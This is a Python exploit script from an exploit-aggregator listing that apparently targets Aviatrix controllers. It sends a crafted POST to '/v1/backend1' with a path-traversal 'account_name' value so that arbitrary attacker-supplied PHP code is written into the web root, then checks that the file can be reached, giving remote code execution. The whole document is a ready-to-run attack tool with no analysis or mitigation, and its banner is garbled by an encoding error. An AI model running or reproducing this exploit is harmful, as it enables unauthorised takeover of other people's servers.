Share
## https://sploitus.com/exploit?id=PACKETSTORM:164461
#!/usr/bin/env python3  
import requests  
from requests.structures import CaseInsensitiveDict  
from colorama import Fore, Style  
import argparse  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  
print(f"""  
  
โ–‘โ–ˆโ–€โ–€โ–ˆ โ–‘โ–ˆโ”€โ”€โ–‘โ–ˆ โ–‘โ–ˆโ–€โ–€โ–€ โ”€โ”€ โ–ˆโ–€โ–ˆ โ–ˆโ–€โ–€โ–ˆ โ–ˆโ–€โ–ˆ โ–„โ–ˆโ”€ โ”€โ”€ โ”€โ–ˆโ–€โ–ˆโ”€ โ–ˆโ–€โ–€โ–ˆ โ–„โ–€โ–€โ–„ โ–„โ–€โ–€โ–„ โ–ˆโ–€โ–€โ–ˆ  
โ–‘โ–ˆโ”€โ”€โ”€ โ”€โ–‘โ–ˆโ–‘โ–ˆโ”€ โ–‘โ–ˆโ–€โ–€โ–€ โ–€โ–€ โ”€โ–„โ–€ โ–ˆโ–„โ–€โ–ˆ โ”€โ–„โ–€ โ”€โ–ˆโ”€ โ–€โ–€ โ–ˆโ–„โ–„โ–ˆโ–„ โ–ˆโ–„โ–€โ–ˆ โ–„โ–€โ–€โ–„ โ–ˆโ–„โ–„โ”€ โ–ˆโ–„โ–€โ–ˆ  
โ–‘โ–ˆโ–„โ–„โ–ˆ โ”€โ”€โ–€โ–„โ–€โ”€ โ–‘โ–ˆโ–„โ–„โ–„ โ”€โ”€ โ–ˆโ–„โ–„ โ–ˆโ–„โ–„โ–ˆ โ–ˆโ–„โ–„ โ–„โ–ˆโ–„ โ”€โ”€ โ”€โ”€โ”€โ–ˆโ”€ โ–ˆโ–„โ–„โ–ˆ โ–€โ–„โ–„โ–€ โ–€โ–„โ–„โ–€ โ–ˆโ–„โ–„โ–ˆ  
Author : 0xJoyGhosh  
Org : System00 Security  
Twitter: @0xjoyghosh  
  
""")  
try:  
parser = argparse.ArgumentParser()  
parser.add_argument("-u", "--url", help="Enter Target Url With scheme Ex: -u https://avaitix.target.com", type=str)  
parser.add_argument("-c", "--code", help="Enter php code Ex: -c '<?php phpinfo(); ?>' ", type=str)  
parser.add_argument("-n", "--name", help="Enter php code Ex: -n 'filename' ", type=str)  
args = parser.parse_args()  
url =f"{args.url}/v1/backend1"  
except TypeError:  
print("Type -h To See all the options")  
except():  
exit()  
def exploit(url,path,code):  
headers = CaseInsensitiveDict()  
headers["Content-Type"] = "application/x-www-form-urlencoded"  
data = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{path}.php&data={code}'  
resp = requests.post(url, headers=headers, data=data,verify=False)  
stat = requests.get(f"{args.url}/v1/{path}",verify=False)  
if resp.status_code==200:  
if stat.status_code==200:  
print(f"[ {Fore.RED} Exploited {Fore.BLACK}] [{Fore.GREEN}{args.url}/v1/{path}{Fore.BLACK} ]")  
print("")  
else:  
print("[ Exploit successful Creating File Failed ]")  
pass  
else:  
print(f'[{Fore.BLUE} Exploit Unsuccessful {Fore.BLUE}]')  
  
if args.url is not None:  
if args.code is not None:  
if args.name is not None:  
exploit(url,args.name,args.code)  
else:  
print('Type -h to see help Menu')  
else:  
print('Type -h to see help Menu')  
else:  
print('Type -h to see help Menu')